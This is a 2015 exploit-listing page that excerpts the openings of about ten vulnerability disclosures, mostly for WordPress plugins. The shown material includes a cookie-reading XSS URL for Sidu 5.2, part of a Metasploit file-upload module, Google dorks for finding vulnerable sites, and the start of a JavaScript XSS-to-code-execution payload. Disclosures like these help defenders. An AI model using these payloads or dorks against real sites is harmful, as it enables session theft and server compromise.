Sidu 5.2 Admin XSS Vulnerability

15 May 2015 - Source: http://www.mondounix.com
Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
Vendor Notification  May 12, 2015
May 13, 2015: Public Disclosure
 
Severity...

Read more »

WordPress RevSlider 3.0.95 File Upload / Execute

15 May 2015 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
...

Read more »

WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 May 2015 - Source: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE...

Read more »

WordPress Freshmail 1.5.8 SQL Injection

15 May 2015 - Source: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...

Read more »

WordPress Ad Inserter 1.5.2 CSRF / XSS

9 May 2015 - Source: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
.. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...

Read more »

WordPress Embed-Articles 7.0.3 CSRF / XSS

9 May 2015 - Source: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
.. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...

Read more »

WordPress Akismet 3.1.1 Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ , https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
User input reaches a sensitive sink when the function add_comment_author_url() is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...

Read more »

WordPress 4.2.1 XSS / Code Execution

9 May 2015 - Source: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After Being Triggered With An
Administrator Privileged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...

Read more »

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 May 2015 - Source: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....

Read more »

WordPress 4.2 Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes...

Read more »